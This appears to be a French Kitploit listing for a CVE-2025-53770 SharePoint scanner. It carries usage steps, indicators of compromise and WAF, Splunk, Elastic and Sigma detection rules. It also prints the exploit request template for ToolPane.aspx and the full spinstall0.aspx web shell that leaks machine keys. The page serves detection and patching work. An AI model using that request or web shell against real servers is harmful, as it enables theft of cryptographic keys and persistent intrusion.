Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/zephrfish/cve-2025-53770-scanner
Outils DéfensifsGestion des Indicateurs de Compromission (IOC)Scanners de VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRenseignement sur les MenacesRéponse aux IncidentsAnalyse de Journaux
GitHubzephrfish/cve-2025-53770-scanner

CVE-2025-53770-Scanner

ToolShell scanner - CVE-2025-53770 et informations de détection

1855il y a 1 anPas encore vérifié
Voir le dépôt

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Scanner de vulnérabilité SharePoint CVE-2025-53770

100% bricolé avec tous les tweets contenant des payloads et différentes attaques, donc livré sans aucune garantie, etc. Le scanner est conçu pour identifier les instances vulnérables et dispose d'une configuration avec des utilisations connues dans la nature de l'exploitation. Il est principalement conçu pour une utilisation défensive afin d'identifier les instances vulnérables et de vous permettre de corriger les choses.

Ce scanner effectue des vérifications automatisées des déploiements SharePoint en :

  • Envoyant des requêtes POST personnalisées aux points de terminaison ToolPane de SharePoint avec des payloads d'exploitation
  • Détectant les tentatives d'extraction de clés machine et les exploitations réussies
  • Identifiant le déploiement de payload secondaire (spinstall0.aspx)
  • Analysant les réponses pour des indicateurs de vulnérabilité basés sur des modèles d'attaque observés
  • Fournissant des rapports détaillés avec des niveaux de confiance et des alertes d'action immédiate
  • Supportant l'analyse concurrente pour l'efficacité

Capacités de détection clés

CRITIQUE : Détection de l'extraction de clé machine

  • Détecte les réponses d'extraction de clé machine réussies
  • Identifie l'exposition de ValidationKey, DecryptionKey et CompatibilityMode
  • Reconnaît les modèles de clé machine délimités par des barres verticales (ValidationKey|Validation|DecryptionKey|Decryption|CompatibilityMode)
  • Déclenche des alertes d'action immédiate pour les systèmes compromis

Détection de payload secondaire

  • Identifie les tentatives de déploiement de spinstall0.aspx
  • Détecte les modèles de code payload C# ASP.NET
  • Reconnaît l'utilisation de System.Web.Configuration.MachineKeySection
  • Détection de chemin spécifique à la version (SP2013: WEBSER~1\15\ vs SP2016+: WEBSER~1\16\)

Installation

  1. Clonez le dépôt :
root@kitploit:~
git clone https://github.com/ZephrFish/CVE-2025-53770-Scanner
cd CVE-2025-53770-Scanner
  1. Installez les dépendances :
root@kitploit:~
pip install -r requirements.txt

Utilisation

Utilisation de base

Créez un fichier texte avec les hôtes cibles (un par ligne) :

root@kitploit:~
sharepoint1.example.com
sharepoint2.example.net
internal-sp.company.local

Exécutez le scanner :

root@kitploit:~
python3 scanner.py -i hosts.txt

python3 scanner.py -i hosts.txt -o results.json -l scan.log -t 20 -v

Options en ligne de commande

OptionDescriptionPar défaut
-i, --inputChemin vers le fichier de liste d'hôtes (obligatoire)-
-o, --outputFichier de sortie pour les résultats (.json, .csv, .txt)Aucun
-l, --logfileChemin du fichier de journalisation détailléeAucun
-t, --threadsNombre de threads concurrents10
-v, --verboseActiver la sortie détaillée et la journalisationFalse

Formats de sortie

Sortie JSON (-o results.json)

root@kitploit:~
[
  {
    "host": "sharepoint.example.com",
    "url": "https://sharepoint.example.com/_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx",
    "scan_time": "2025-07-21T10:30:00.123456",
    "vulnerable": true,
    "status_code": 200,
    "response_size": 15432,
    "error": null,
    "response_time": 1.23
  }
]

Sortie CSV (-o results.csv)

Fournit des données tabulaires adaptées à l'analyse dans un tableur avec des colonnes pour toutes les métriques de scan.

Sortie texte (-o results.txt)

Format lisible par l'homme avec l'état de vulnérabilité et les détails du scan.

Détails de la vulnérabilité

CVE-2025-53770 cible une vulnérabilité de désérialisation dans le composant ExcelDataSet de SharePoint qui a été activement exploitée dans la nature. Le scanner détecte :

Modèles d'attaque identifiés

  1. Exploitation initiale : Requête POST vers /_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx avec un payload sérialisé
  2. Extraction de clé machine : Une exploitation réussie retourne la configuration machine délimitée par des barres verticales :
    root@kitploit:~
    ValidationKey|Validation|DecryptionKey|Decryption|CompatibilityMode
    Exemple : [128-256 caractères hex]|HMACSHA256|[48-96 caractères hex]|AES|Framework45
    
  3. Payload secondaire : Déploiement de spinstall0.aspx pour un accès persistant et l'extraction de clés
  4. Ciblage de version : Chemins différents pour les versions de SharePoint (layouts 15/ vs 16/)

IOC confirmés issus de l'exploitation active

  • User-Agent : Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
  • Referer : /_layouts/SignOut.aspx
  • Content-Length : Généralement 7699-8000+ octets
  • Taille du payload : Paramètres CompressedDataTable volumineux encodés en base64
  • Indicateurs de réponse : Chaînes de clé machine, déploiement de spinstall0.aspx
  • Infrastructure d'attaque : 65.38.121.198, 162.243.204.189, 165.22.18.129

Logique de détection

Le scanner analyse les réponses pour :

  1. Modèles d'extraction de clé machine (confiance CRITIQUE)
  2. Indicateurs de payload secondaire (confiance ÉLEVÉE)
  3. Traitement du composant ExcelDataSet/Scorecard (confiance MOYENNE)
  4. Modèles d'erreur ToolPane et caractéristiques de réponse anormales (confiance FAIBLE)

Considérations de sécurité

  • Cet outil est conçu pour les tests de sécurité autorisés uniquement
  • Assurez-vous d'avoir l'autorisation appropriée avant d'analyser tout système
  • Le scanner utilise HTTPS par défaut mais accepte les certificats auto-signés
  • Les journaux peuvent contenir des informations sensibles - sécurisez-les correctement
  • Tenez compte de l'impact réseau lors de l'utilisation d'un nombre élevé de threads

Exemple de session de scan

root@kitploit:~
$ python3 scanner.py -i corporate-sharepoint.txt -o vuln-results.json -l scan.log -v

Démarrage du scan de 150 hôtes avec 10 threads...
Cible CVE : CVE-2025-53770 (Désérialisation ExcelDataSet SharePoint)
Journalisation vers : scan.log
Les résultats seront sauvegardés dans : vuln-results.json

[+] VULNÉRABLE [CRITIQUE] : sp-prod-01.acme.local
[-] Non vulnérable : sp-dev-02.acme.local  
[!] ERREUR : offline-sp.acme.local - Délai de connexion dépassé
[+] VULNÉRABLE [ÉLEVÉ] : sp-legacy.acme.local
Progression : 50/150 (33.3%)
Progression : 100/150 (66.7%)
Progression : 150/150 (100.0%)

============================================================
SCAN TERMINÉ
============================================================
Total des hôtes scannés : 150
Hôtes vulnérables : 3
Taux de réussite : 97.3%

HÔTES VULNÉRABLES (CVE-2025-53770) :

  CRITIQUE - CLÉ MACHINE EXTRAITE (1 hôte) :
    • sp-prod-01.acme.local (Temps de réponse : 0.85s, Version : 2016+)
      AVERTISSEMENT : ACTION IMMÉDIATE REQUISE : Clés machine compromises

  CONFIANCE ÉLEVÉE (1 hôte) :
    • sp-legacy.acme.local (Temps de réponse : 1.23s, Version : 2013-2016)

  CONFIANCE FAIBLE (1 hôte) :
    • sp-archive.acme.local (Temps de réponse : 2.10s, Version : Inconnue)

Résultats détaillés sauvegardés dans : vuln-results.json

Dépannage

Problèmes courants

  1. Délais de connexion : Augmentez le délai ou réduisez le nombre de threads
  2. Erreurs SSL : Le scanner désactive les avertissements SSL par défaut
  3. Erreurs de permission : Assurez-vous d'avoir un accès en écriture pour les fichiers de sortie/journaux
  4. Utilisation mémoire : Surveillez avec de grandes listes d'hôtes

Analyse des journaux

Activez la journalisation détaillée (-v) et les fichiers de journal (-l) pour un dépannage détaillé :

root@kitploit:~
tail -f scan.log

Analyse de l'exploitation

Payloads d'attaque observés

Le scanner intègre la détection des modèles d'exploitation confirmés observés dans les attaques actives :

Structure du payload primaire

root@kitploit:~
POST /_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx HTTP/1.1
Host: target.domain.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 7699
Content-Type: application/x-www-form-urlencoded
Referer: /_layouts/SignOut.aspx
Connection: close

MSOTlPn_Uri=http%3A%2F%2F{{host}}%2F_controltemplates%2F15%2FAclEditor.ascx
&MSOTlPn_DWP=[Payload ExcelDataSet avec CompressedDataTable contenant l'exploit sérialisé]

Payload secondaire (spinstall0.aspx)

root@kitploit:~
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<script runat="server" language="c#" CODEPAGE="65001">
    public void Page_load()
    {
        var sy = System.Reflection.Assembly.Load("System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a");
        var mkt = sy.GetType("System.Web.Configuration.MachineKeySection");
        var gac = mkt.GetMethod("GetApplicationConfig", System.Reflection.BindingFlags.Static | System.Reflection.BindingFlags.NonPublic);
        var cg = (System.Web.Configuration.MachineKeySection)gac.Invoke(null, new object[0]);
        Response.Write(cg.ValidationKey+"|"+cg.Validation+"|"+cg.DecryptionKey+"|"+cg.Decryption+"|"+cg.CompatibilityMode);
    }
</script>

Format attendu de la réponse de clé machine

root@kitploit:~
ValidationKey: [Chaîne hexadécimale de 128 à 256 caractères]
Validation: HMACSHA256|HMACSHA1|SHA1
DecryptionKey: [Chaîne hexadécimale de 48 à 96 caractères]
Decryption: AES|DES|3DES
CompatibilityMode: Framework20SP1|Framework45|Framework40

Guide de détection et de surveillance

Détection des tentatives d'exploitation de CVE-2025-53770

Les organisations devraient mettre en œuvre les mécanismes de détection suivants pour identifier les tentatives d'exploitation potentielles :

1. Règles de pare-feu applicatif (WAF)

Surveillez les requêtes POST suspectes vers les points de terminaison ToolPane de SharePoint :

root@kitploit:~
# Exemples de motifs de règles de détection WAF
POST /_layouts/15/ToolPane.aspx*
POST /_layouts/*/ToolPane.aspx*
Chaîne de requête : "DisplayMode=Edit&a=/ToolPane.aspx"
Corps de la requête contenant : "MSOTlPn_Uri", "MSOTlPn_DWP"
Corps de la requête contenant : "ExcelDataSet", "CompressedDataTable"
Corps de la requête contenant : "Scorecard:ExcelDataSet"
Corps de la requête contenant : "H4sIAAAAAAAEA" (octets magiques gzip en base64)
Content-Length > 5000 octets (taille typique du payload)
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0)
Referer: /_layouts/SignOut.aspx

Modèles d'exploitation observés :

  • Tailles de payload typiquement de 7000 à 8000+ octets
  • Données compressées encodées URL dans le paramètre CompressedDataTable
  • Chaîne User-Agent spécifique : Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0)
  • Content-Type: application/x-www-form-urlencoded
  • En-tête Connection: close souvent présent
  • Objets .NET sérialisés encodés en base64 dans le payload
  • La réponse contient des clés machine au format délimité par des barres verticales
  • Requêtes secondaires vers les fichiers spinstall0.aspx déployés

2. Journaux ULS de SharePoint

Surveillez les journaux du Service de journalisation unifié (ULS) de SharePoint pour :

root@kitploit:~
Catégorie : SharePoint Foundation Web Controls
Niveau : Inattendu, Erreur, Critique
Mots-clés : "ToolPane", "ExcelDataSet", "Deserialization"
Processus : w3wp.exe

Indicateurs clés dans les journaux ULS :

  • Exceptions inattendues dans le traitement de ToolPane.aspx
  • Erreurs de désérialisation dans les composants Microsoft.PerformancePoint
  • Corruption mémoire ou plantages de processus dans w3wp.exe

3. Journaux d'accès IIS

Surveillez les journaux IIS pour les modèles d'exploitation :

root@kitploit:~
# Requêtes d'analyse de journaux (remplacez par la syntaxe de votre SIEM)
cs-method="POST" AND cs-uri-stem="/_layouts/15/ToolPane.aspx"
cs-method="POST" AND cs-uri-query="DisplayMode=Edit&a=/ToolPane.aspx"
cs-bytes > 7000 (taille typique du payload d'exploitation)
cs(User-Agent)="Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0"
cs(Referer)="/_layouts/SignOut.aspx"
sc-status=200 AND time-taken > 5000 (traitement lent indiquant une désérialisation)

IOC spécifiques provenant d'attaques réelles :

root@kitploit:~
POST /_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx
Content-Length: 7699
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Referer: /_layouts/SignOut.aspx
Corps contient : MSOTlPn_Uri=http%3A%2F%2F[domaine]%2F_controltemplates%2F15%2FAclEditor.ascx
Corps contient : CompressedDataTable%3D%22H4sIAAAAAAAEANVa23LbSJLt3stEzMzu0%2F6AQs%2B2BJCiu%2BWQ

4. Analyse du trafic réseau

Surveillez le trafic réseau pour :

  • Tailles de requêtes POST inhabituelles vers les serveurs SharePoint
  • Requêtes répétées vers ToolPane.aspx depuis une seule source
  • Payloads encodés en base64 dans les corps HTTP POST
  • Chaînes User-Agent non navigateur ciblant SharePoint

5. Journaux d'événements Windows

Surveillez les journaux d'événements Windows sur les serveurs SharePoint :

root@kitploit:~
Journal des événements : Application
Source : ASP.NET, SharePoint Foundation
ID d'événement : 1309, 1310 (erreurs d'application)
Journal des événements : Système
Source : Application Error
Processus : plantages de w3wp.exe

6. Règles de détection SIEM

Requête de détection Splunk :
root@kitploit:~
index=iis source="*iis*" 
| search cs_method="POST" cs_uri_stem="/_layouts/15/ToolPane.aspx" cs_uri_query="DisplayMode=Edit&a=/ToolPane.aspx"
| eval payload_size=tonumber(cs_bytes)
| where payload_size > 7000
| search cs_User_Agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0"
| stats count by src_ip, cs_uri_stem, payload_size
| sort -payload_size
Détection améliorée pour les attaques réelles :
root@kitploit:~
index=iis 
| search cs_method="POST" AND cs_uri_stem="/_layouts/15/ToolPane.aspx"
| where cs_bytes > 7000 AND cs_bytes < 10000
| search cs_Referer="/_layouts/SignOut.aspx"
| eval attack_pattern=if(like(cs_User_Agent, "%Windows NT 10.0; Win64; x64; rv:120.0%"), "CVE-2025-53770", "Autre")
| where attack_pattern="CVE-2025-53770"
| table _time, src_ip, cs_uri_query, cs_bytes, sc_status
Requête Elastic/Kibana :
root@kitploit:~
{
  "query": {
    "bool": {
      "must": [
        {"term": {"http.request.method": "POST"}},
        {"term": {"url.path": "/_layouts/15/ToolPane.aspx"}},
        {"term": {"url.query": "DisplayMode=Edit&a=/ToolPane.aspx"}},
        {"range": {"http.request.bytes": {"gte": 7000, "lte": 10000}}},
        {"term": {"user_agent.original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0"}},
        {"term": {"http.request.referrer": "/_layouts/SignOut.aspx"}}
      ]
    }
  }
}
Règle Sigma pour CVE-2025-53770 :
root@kitploit:~
title: Exploitation CVE-2025-53770 SharePoint ExcelDataSet
id: cve-2025-53770-sharepoint-exploit
description: Détecte les tentatives d'exploitation de la vulnérabilité de désérialisation SharePoint CVE-2025-53770
references:
    - https://github.com/your-repo/CVE-2025-53770-Scanner
author: Équipe de sécurité
date: 2025/07/21
logsource:
    category: webserver
    product: iis
detection:
    selection:
        cs-method: 'POST'
        cs-uri-stem: '/_layouts/15/ToolPane.aspx'
        cs-uri-query: 'DisplayMode=Edit&a=/ToolPane.aspx'
        cs-bytes:
            - gte: 7000
            - lte: 10000
        cs-User-Agent: 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0'
        cs-Referer: '/_layouts/SignOut.aspx'
    condition: selection
falsepositives:
    - Activités administratives SharePoint légitimes
level: high
tags:
    - attack.initial_access
    - attack.t1190
    - cve.2025.53770

7. Indicateurs comportementaux

Surveillez ces comportements post-exploitation :

  • Connexions réseau sortantes inhabituelles depuis les serveurs SharePoint
  • Création de nouveaux comptes utilisateur dans SharePoint ou Active Directory
  • Téléchargements ou modifications de fichiers non autorisés
  • Tentatives d'élévation de privilèges
  • Mouvement latéral vers d'autres systèmes

Actions de réponse recommandées

  1. Réponse immédiate :

    • Bloquer les IP sources suspectes au niveau du pare-feu/WAF
    • Isoler les serveurs SharePoint affectés si l'exploitation est confirmée
    • Conserver les journaux et les dumps mémoire pour analyse forensique
  2. Investigation :

    • Analyser les payloads des requêtes POST pour détecter un contenu malveillant
    • Vérifier les indicateurs d'exécution de code réussie
    • Examiner les activités des comptes utilisateur et les modifications de permissions
    • Corréler avec d'autres événements de sécurité
  3. Contention :

    • Appliquer les correctifs de sécurité immédiatement
    • Mettre en œuvre des règles WAF pour bloquer les tentatives d'exploitation
    • Segmenter les serveurs SharePoint des ressources réseau critiques

Exemples d'intégration SIEM

Importation des résultats de scan dans Splunk :

root@kitploit:~
# Convertir les résultats de scan pour ingestion Splunk
python3 scanner.py -i hosts.txt -o results.json
# Importer dans l'index Splunk
curl -k -H "Authorization: Splunk <token>" -X POST \
  "https://splunk-server:8088/services/collector" \
  -d @results.json
Télécharger l’outil